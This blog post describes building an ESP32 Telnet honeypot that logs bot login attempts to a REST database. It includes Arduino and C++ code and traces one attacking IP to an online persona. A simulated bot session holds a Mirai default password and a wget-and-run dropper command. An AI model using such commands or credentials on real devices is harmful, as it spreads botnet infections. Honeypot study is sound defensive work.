Bots, attackers and honeypots
Posted May 22, 2020 08:00 AM
Did you ever wonder how many times a day you are deliberately being scanned or attacked online?
More and more things are connected to the internet, and IoT devices are becoming part of our daily lives.
Small Linux devices capable of talking to the internet are everywhere these days.
With these devices on the rise, it's only natural that the threat of online attacks is rising too.
Why?
Well, most of the time IoT devices are less secure out of the box than your computer, and the reason is pretty simple. These devices target everyone, not only the computer geek, but also granny and grandpa.
To be accessible to all, they have to be easy to use for all.
The most common strategy is to ship them with a default username and password.
If you keep these defaults, it is really easy for malicious people to gain access to your device.
The scariest part is that they are doing it, and they are doing it en masse.
Bots are scanning for these devices all the time, and when they find one they run their pre-programmed instructions against it.
A few years ago I coded a GitHub project called PotHead, a Telnet honeypot Python script.
Today I've revived the project under the name HoneyHive. This code runs on an ESP32, simulates a Telnet server and logs the data to a NoSQL REST database.
You can find the complete Source code here:
https://hackforums.net/showthread.php?tid=6066976
Making a similar server is rather easy.
The example sketches that ship with the ESP32 Arduino core contain a generic Telnet server (WiFiTelnetToSerial) that we can use as a starting point. Why write something yourself if someone already did it right?
It should look something like this.
Code
/*
WiFiTelnetToSerial - Example Transparent UART to Telnet Server for ESP32
Copyright (c) 2017 Hristo Gochkov. All rights reserved.
This file is part of the ESP32 WiFi library for Arduino environment.
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <WiFi.h>
#include <WiFiMulti.h>
WiFiMulti wifiMulti;
//how many clients should be able to telnet to this ESP32
#define MAX_SRV_CLIENTS 1
const char* ssid = "**********";
const char* password = "**********";
WiFiServer server(23);
WiFiClient serverClients[MAX_SRV_CLIENTS];
void setup() {
Serial.begin(115200);
Serial.println("\nConnecting");
wifiMulti.addAP(ssid, password);
wifiMulti.addAP("ssid_from_AP_2", "your_password_for_AP_2");
wifiMulti.addAP("ssid_from_AP_3", "your_password_for_AP_3");
Serial.println("Connecting Wifi ");
for (int loops = 10; loops > 0; loops--) {
if (wifiMulti.run() == WL_CONNECTED) {
Serial.println("");
Serial.print("WiFi connected ");
Serial.print("IP address: ");
Serial.println(WiFi.localIP());
break;
}
else {
Serial.println(loops);
delay(1000);
}
}
if (wifiMulti.run() != WL_CONNECTED) {
Serial.println("WiFi connect failed");
delay(1000);
ESP.restart();
}
//start UART and the server
Serial2.begin(9600);
server.begin();
server.setNoDelay(true);
Serial.print("Ready! Use 'telnet ");
Serial.print(WiFi.localIP());
Serial.println(" 23' to connect");
}
void loop() {
uint8_t i;
if (wifiMulti.run() == WL_CONNECTED) {
//check if there are any new clients
if (server.hasClient()){
for(i = 0; i < MAX_SRV_CLIENTS; i++){
//find free/disconnected spot
if (!serverClients[i] || !serverClients[i].connected()){
if(serverClients[i]) serverClients[i].stop();
serverClients[i] = server.available();
if (!serverClients[i]) Serial.println("available broken");
Serial.print("New client: ");
Serial.print(i); Serial.print(' ');
Serial.println(serverClients[i].remoteIP());
break;
}
}
if (i >= MAX_SRV_CLIENTS) {
//no free/disconnected spot so reject
server.available().stop();
}
}
//check clients for data
for(i = 0; i < MAX_SRV_CLIENTS; i++){
if (serverClients[i] && serverClients[i].connected()){
if(serverClients[i].available()){
//get data from the telnet client and push it to the UART
while(serverClients[i].available()) Serial2.write(serverClients[i].read());
}
}
else {
if (serverClients[i]) {
serverClients[i].stop();
}
}
}
//check UART for data
if(Serial2.available()){
size_t len = Serial2.available();
uint8_t sbuf[len];
Serial2.readBytes(sbuf, len);
//push UART data to all connected telnet clients
for(i = 0; i < MAX_SRV_CLIENTS; i++){
if (serverClients[i] && serverClients[i].connected()){
serverClients[i].write(sbuf, len);
delay(1);
}
}
}
}
else {
Serial.println("WiFi not connected!");
for(i = 0; i < MAX_SRV_CLIENTS; i++) {
if (serverClients[i]) serverClients[i].stop();
}
delay(1000);
}
}
This code still contains a lot of things we don't need: it bridges data between the UART (Serial2) and the connected Telnet clients, which a honeypot has no use for.
So let's clean it up.
Code
/*
WiFiTelnetToSerial - Example Transparent UART to Telnet Server for ESP32
Copyright (c) 2017 Hristo Gochkov. All rights reserved.
This file is part of the ESP32 WiFi library for Arduino environment.
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <WiFi.h>
#include <WiFiMulti.h>
WiFiMulti wifiMulti;
//how many clients should be able to telnet to this ESP32
#define MAX_SRV_CLIENTS 3
const char* ssid = "**********";
const char* password = "**********";
WiFiServer server(23);
WiFiClient serverClients[MAX_SRV_CLIENTS];
void setup() {
Serial.begin(9600);
Serial.println("\nConnecting");
wifiMulti.addAP(ssid, password);
Serial.println("Connecting Wifi ");
for (int loops = 10; loops > 0; loops--) {
if (wifiMulti.run() == WL_CONNECTED) {
Serial.println("");
Serial.print("WiFi connected ");
Serial.print("IP address: ");
Serial.println(WiFi.localIP());
break;
}
else {
Serial.println(loops);
delay(1000);
}
}
if (wifiMulti.run() != WL_CONNECTED) {
Serial.println("WiFi connect failed");
delay(1000);
ESP.restart();
}
server.begin();
server.setNoDelay(true);
Serial.print("Ready! Use 'telnet ");
Serial.print(WiFi.localIP());
Serial.println(" 23' to connect");
}
void loop() {
uint8_t i;
if (wifiMulti.run() == WL_CONNECTED) {
//check if there are any new clients
if (server.hasClient()){
for(i = 0; i < MAX_SRV_CLIENTS; i++){
//find free/disconnected spot
if (!serverClients[i] || !serverClients[i].connected()){
if(serverClients[i]) serverClients[i].stop();
serverClients[i] = server.available();
if (!serverClients[i]) Serial.println("available broken");
Serial.print("New client: ");
Serial.print(i); Serial.print(' ');
Serial.println(serverClients[i].remoteIP());
break;
}
}
if (i >= MAX_SRV_CLIENTS) {
//no free/disconnected spot so reject
server.available().stop();
}
}
//check clients for data
for(i = 0; i < MAX_SRV_CLIENTS; i++){
if (serverClients[i] && serverClients[i].connected()){
if(serverClients[i].available()){
//the data the client sends will be read and handled here in the next step
}
}
else {
if (serverClients[i]) {
serverClients[i].stop();
}
}
}
}
else {
Serial.println("WiFi not connected!");
for(i = 0; i < MAX_SRV_CLIENTS; i++) {
if (serverClients[i]) serverClients[i].stop();
}
delay(1000);
}
}
I've removed all mentions of Serial2 and the whole UART part, raised the number of clients to 3, and set the serial console to 9600 baud, which is easier for me because it's the default monitor speed in the tool I'm using for this (PlatformIO in VS Code).
What's next?
Well, we need to emulate a few more things to make it look like a generic Telnet login: a banner, a username and a password prompt, and a shell prompt that answers whatever the bot types.
Code
#include <WiFi.h>
#include <WiFiMulti.h>
WiFiMulti wifiMulti;
//how many clients should be able to telnet to this ESP32
#define MAX_SRV_CLIENTS 3
#define CTRLLED 2
const char* ssid = "*****";
const char* password = "*****";
//per-client stage of the fake login: 0 = nothing received yet, 1 = asked for username, 2 = asked for password, 3+ = shell prompt
int clientNumber[MAX_SRV_CLIENTS];
WiFiServer server(23);
WiFiClient serverClients[MAX_SRV_CLIENTS];
void setup() {
pinMode(CTRLLED,OUTPUT);
digitalWrite(CTRLLED,HIGH);
Serial.begin(9600);
Serial.println("\nConnecting");
wifiMulti.addAP(ssid, password);
Serial.println("Connecting Wifi ");
for (int loops = 10; loops > 0; loops--) {
if (wifiMulti.run() == WL_CONNECTED) {
digitalWrite(CTRLLED,LOW);
Serial.println("");
Serial.print("WiFi connected ");
Serial.print("IP address: ");
Serial.println(WiFi.localIP());
break;
}
else {
Serial.println(loops);
delay(1000);
}
}
if (wifiMulti.run() != WL_CONNECTED) {
Serial.println("WiFi connect failed");
delay(1000);
ESP.restart();
}
server.begin();
server.setNoDelay(true);
Serial.print("Ready! Use 'telnet ");
Serial.print(WiFi.localIP());
Serial.println(" 23' to connect");
}
void loop() {
uint8_t i;
if (wifiMulti.run() == WL_CONNECTED) {
//check if there are any new clients
if (server.hasClient()){
for(i = 0; i < MAX_SRV_CLIENTS; i++){
//find free/disconnected spot
if (!serverClients[i] || !serverClients[i].connected()){
if(serverClients[i]) serverClients[i].stop();
serverClients[i] = server.available();
if (!serverClients[i]) Serial.println("available broken");
//a new connection reuses this slot, so restart the fake login sequence for it
clientNumber[i] = 0;
Serial.print("New client: ");
Serial.print(i); Serial.print(' ');
Serial.println(serverClients[i].remoteIP());
//fake banner: make the box look like a cheap embedded Linux device running BusyBox
serverClients[i].write("Welcome! Telnet server ...V0.012.198... \r\n LoRa Wan SusKey 0.2.9 (c) 1999-2004 \r\n -*-contact [email protected] for further information!-*-\r\n Busybox V1.12.4 (2020-04-13) Built-in shell \r\n Enter 'help' for a list of built in commands. \r\n tty id \"/dev/pts/0 \"\r\n\r\n");
break;
}
}
if (i >= MAX_SRV_CLIENTS) {
//no free/disconnected spot so reject
server.available().stop();
}
}
//check clients for data
for(i = 0; i < MAX_SRV_CLIENTS; i++){
if (serverClients[i] && serverClients[i].connected()){
if(serverClients[i].available()){
//collect what the client sent (readString() returns after the Stream timeout, 1 s by default)
String dBuff = "";
while(serverClients[i].available()){
dBuff += serverClients[i].readString();
}
//bots usually try to fetch and run a dropper in /bin or /tmp; pretend it worked
if(dBuff.indexOf("bin") >= 0){
serverClients[i].write("Running in background!\r\n");
}
//log remote IP, slot number and the raw input to serial
Serial.print(serverClients[i].remoteIP());
Serial.print(" : ");
Serial.print(i);
Serial.print(" : ");
Serial.println(dBuff);
//walk the fake login: first input gets the username prompt, second the password prompt, everything after that a root shell
clientNumber[i]++;
if(clientNumber[i]==1){
serverClients[i].write("\r\nusername: ");
}
else if (clientNumber[i]==2)
{
serverClients[i].write("\r\npassword: ");
}
else{
serverClients[i].write("#> ");
}
dBuff ="";
}
}
else {
if (serverClients[i]) {
serverClients[i].stop();
}
}
}
}
else {
Serial.println("WiFi not connected!");
for(i = 0; i < MAX_SRV_CLIENTS; i++) {
if (serverClients[i]) serverClients[i].stop();
}
delay(1000);
}
}
Wow, that took some time. But it's pretty easy!
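Added example, not the HoneyHive code or anything else from the post: the same fake login as the sketch above, written as a self-contained state machine in standard C++ so it can be compiled and tested on a PC and then driven from the sketch by feeding it the bytes read from serverClients[i] and writing back what it returns. It goes a bit beyond the sketch: it sends the first prompt together with the banner, skips the Telnet IAC option negotiation many bots send before their credentials, assembles whole lines however the bytes are chunked, answers wget/tftp the way the sketch answers "bin", and caps the line buffer so a bot cannot exhaust the ESP32's RAM by never sending a newline. The class and function names, the banner text and the sample bot input are ours (constructed, not a capture).

```cpp
// Added example (not the HoneyHive sketch): per-connection state of the fake Telnet login.
// Standard C++ so it runs on a PC; on the ESP32, write onConnect() after accept and pass
// every chunk read from the client to onData(). All names here are our own.
#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

struct LoginRecord {                 // what ends up in the database later
    std::string remoteIp;            // from the TCP stack, not attacker-controlled
    std::string username;
    std::string password;
    std::vector<std::string> commands;
};

class HoneypotSession {
public:
    enum Stage { USERNAME, PASSWORD, SHELL };
    static constexpr size_t kMaxLine = 256;   // bots sometimes spray kilobytes; keep memory bounded

    explicit HoneypotSession(const std::string& ip) : stage_(USERNAME) { record_.remoteIp = ip; }

    // Banner plus first prompt, so the bot sees "login:" without having to send anything first.
    std::string onConnect() const { return "\r\nBusyBox v1.12.4 built-in shell\r\n\r\nlogin: "; }

    // Feed raw bytes from the socket; returns what to write back to the client.
    std::string onData(const std::string& bytes) {
        std::string reply;
        for (size_t i = 0; i < bytes.size(); ++i) {
            unsigned char c = static_cast<unsigned char>(bytes[i]);
            if (c == 0xFF) { i += skipIac(bytes, i); continue; }      // Telnet IAC negotiation
            if (c == '\r') continue;                                   // telnet clients send CRLF
            if (c == '\n') { reply += handleLine(line_); line_.clear(); continue; }
            if (line_.size() < kMaxLine) line_ += static_cast<char>(c); // bytes over the cap are dropped
        }
        return reply;
    }

    Stage stage() const { return stage_; }
    const LoginRecord& record() const { return record_; }

private:
    // Returns how many bytes after the IAC belong to the command (the loop's ++i adds one more).
    static size_t skipIac(const std::string& b, size_t i) {
        if (i + 1 >= b.size()) return 0;
        unsigned char cmd = static_cast<unsigned char>(b[i + 1]);
        if (cmd == 0xFA) {                                   // SB ... IAC SE (0xFF 0xF0)
            size_t j = i + 2;
            while (j + 1 < b.size() && !(static_cast<unsigned char>(b[j]) == 0xFF &&
                                         static_cast<unsigned char>(b[j + 1]) == 0xF0)) ++j;
            return (j + 1 < b.size()) ? j + 1 - i : b.size() - 1 - i;
        }
        if (cmd >= 0xFB && cmd <= 0xFE) return 2;           // WILL/WONT/DO/DONT + option byte
        return 1;                                            // two-byte command (NOP, GA, ...)
    }

    std::string handleLine(const std::string& line) {
        switch (stage_) {
        case USERNAME:
            record_.username = line; stage_ = PASSWORD;
            return "Password: ";
        case PASSWORD:
            record_.password = line; stage_ = SHELL;        // every credential pair "succeeds"
            return "\r\n# ";
        default:
            record_.commands.push_back(line);
            // Mirai-style loaders chain wget/tftp, chmod and execute; pretend the download worked
            if (line.find("wget") != std::string::npos || line.find("tftp") != std::string::npos)
                return "Connecting to host... 100%\r\n# ";
            if (line.empty()) return "# ";
            return line + ": applet not found\r\n# ";        // BusyBox-style answer for anything else
        }
    }

    Stage stage_;
    std::string line_;
    LoginRecord record_;
};

// Drive one constructed Mirai-style session end to end (sample input, not a capture).
LoginRecord simulateBotSession() {
    HoneypotSession s("203.0.113.9");
    s.onData(std::string("\xFF\xFD\x01\xFF\xFB\x18", 6));   // IAC DO ECHO, IAC WILL TERMINAL-TYPE
    s.onData("root\r\n");
    s.onData("xc3511\r\n");
    s.onData("cd /tmp; wget http://203.0.113.7/bins.sh; sh bins.sh\r\n");
    return s.record();
}
```

On the board, `serverClients[i].write(session.onConnect().c_str())` after accept and `session.onData(chunk)` on every read; `record()` is the object you later push to the database instead of printing it to serial.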
Code
serverClients[i].write("");
Everything is now logged to serial, which is not handy if you want to analyze it all later. That's why you'll need a (simple) database.
SQL would be fine, but I wanted something different, so that I could easily build a nice, not too complex front end.
I settled on restdb.io, a REST database. It can be added to the code with only a few more modifications and we're done.
The most important parts are the HTTP headers that carry the API key and the JSON body that puts the record in the DB. Keep in mind that the key ends up in the firmware image, so use a key that is only allowed to write to this one collection.
One thing to note: whatever these bots type is attacker-controlled input and goes straight into that JSON body, so a stray quote, backslash or control character will break the query (or let the bot add fields of its own). Base64 encode the captured fields before you put them in the body and decode them again when you read them back; that takes all the garbage out.
This should be the code you'll eventually end up with
Just take a closer look at the code, it isn't hard; to be brutally honest, this is easy peasy.
Add a bit of magic to make a page on restdb.io and you're done!
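Added example, again not the author's code: the database record built the way the paragraph above recommends, in standard C++ so it can be tested on a PC (on the ESP32 the returned string is what you hand to the HTTP POST together with the API key header). base64Encode/base64Decode are plain RFC 4648; the field names (ip, user_b64, pass_b64, cmd_b64), the countQuotes check and the sample bot command are ours, not the author's restdb.io schema. naiveRecord shows what happens when the bot's bytes go into the body unencoded.

```cpp
// Added example (not the HoneyHive code): keep attacker-controlled bytes out of the JSON body.
// Field names and the sample payload are assumptions for illustration.
#include <cstdint>
#include <string>

// Base64 per RFC 4648 with '=' padding. The output alphabet contains no quotes,
// backslashes or control characters, so it is always safe inside a JSON string.
std::string base64Encode(const std::string& in) {
    static const char tbl[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    std::string out;
    size_t i = 0;
    while (i + 2 < in.size()) {                      // full 3-byte groups
        uint32_t n = (static_cast<unsigned char>(in[i]) << 16) |
                     (static_cast<unsigned char>(in[i + 1]) << 8) |
                      static_cast<unsigned char>(in[i + 2]);
        out += tbl[(n >> 18) & 63]; out += tbl[(n >> 12) & 63];
        out += tbl[(n >> 6) & 63];  out += tbl[n & 63];
        i += 3;
    }
    size_t rem = in.size() - i;                      // 0, 1 or 2 trailing bytes
    if (rem == 1) {
        uint32_t n = static_cast<unsigned char>(in[i]) << 16;
        out += tbl[(n >> 18) & 63]; out += tbl[(n >> 12) & 63]; out += "==";
    } else if (rem == 2) {
        uint32_t n = (static_cast<unsigned char>(in[i]) << 16) |
                     (static_cast<unsigned char>(in[i + 1]) << 8);
        out += tbl[(n >> 18) & 63]; out += tbl[(n >> 12) & 63]; out += tbl[(n >> 6) & 63]; out += '=';
    }
    return out;
}

// Inverse, for the front end / analysis side. Stops at padding or any non-alphabet byte.
std::string base64Decode(const std::string& in) {
    auto val = [](char c) -> int {
        if (c >= 'A' && c <= 'Z') return c - 'A';
        if (c >= 'a' && c <= 'z') return c - 'a' + 26;
        if (c >= '0' && c <= '9') return c - '0' + 52;
        if (c == '+') return 62;
        if (c == '/') return 63;
        return -1;
    };
    std::string out;
    uint32_t buf = 0;
    int bits = 0;
    for (char c : in) {
        int v = val(c);
        if (v < 0) break;
        buf = (buf << 6) | static_cast<uint32_t>(v);
        bits += 6;
        if (bits >= 8) { bits -= 8; out += static_cast<char>((buf >> bits) & 0xFF); }
    }
    return out;
}

// The naive body: the bot's bytes land inside a JSON string literal unescaped.
std::string naiveRecord(const std::string& ip, const std::string& cmd) {
    return "{\"ip\":\"" + ip + "\",\"cmd\":\"" + cmd + "\"}";
}

// Body the way the post recommends: every attacker-controlled field is base64.
// The IP comes from the TCP stack, so it can stay plain and remain searchable.
std::string safeRecord(const std::string& ip, const std::string& user,
                       const std::string& pass, const std::string& cmd) {
    return "{\"ip\":\"" + ip + "\",\"user_b64\":\"" + base64Encode(user) +
           "\",\"pass_b64\":\"" + base64Encode(pass) +
           "\",\"cmd_b64\":\"" + base64Encode(cmd) + "\"}";
}

// Cheap pre-flight check: a flat object with N string fields has exactly 4*N quotes.
// Any extra quote came from the bot and means the body is no longer the JSON we meant to send.
int countQuotes(const std::string& body) {
    int n = 0;
    for (char c : body) if (c == '"') ++n;
    return n;
}
```

With a constructed Mirai-style command such as `cd /tmp; wget http://203.0.113.7/bins.sh; sh bins.sh; echo "done"`, naiveRecord yields 10 quotes instead of 8 and the POST fails or stores something other than what was typed, while safeRecord always yields exactly 16.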
And my oh my, I've found some interesting things.
The fun thing about these projects is that you can truly dive in and play detective. You can find out so much by analyzing the attackers.
All those IP addresses share a common story: they belong to someone, and somehow they became part of a botnet (farm).
One of these IP addresses was 23.254.226.60.
My curious self wanted to know if this IP address maybe had a web server running, and my oh my, I was so surprised that it did, although it was badly developed.
![[Image: download-1.png]](https://i.ibb.co/922Ktq3/download-1.png)
Well, what could I find out about the person who was so eagerly trying to get inside my poor, poor ESP32? Well, that dodgy visitor counter on the website led me to another page.
![[Image: download-2.png]](https://i.ibb.co/MpqPgBG/download-2.png)
He is also using this counter on another website. Wow! Well, this is getting more interesting. A generic website, nothing of interest on it, but hey, a small YouTube icon; where is this leading me to?
![[Image: download-3.png]](https://i.ibb.co/BnfgZLB/download-3.png)
Well, it led me to a YouTube account and a Discord server, and ultimately to a guy called Greek Helios.
![[Image: download-4.png]](https://i.ibb.co/jh486wz/download-4.png)
Most of these IP addresses have a more tragic story: most of the time they are network-attached devices (NAS boxes, routers) of some kind being held hostage by a bot, most of them a variant of Mirai.
Now you know the story about bots, attackers and honeypots.
And here you can watch it grow:
https://honeyhive-418b.restdb.io/views/intruders
Thank you so much for reading this document. Stay tuned for my next post. Stay safe and stay home!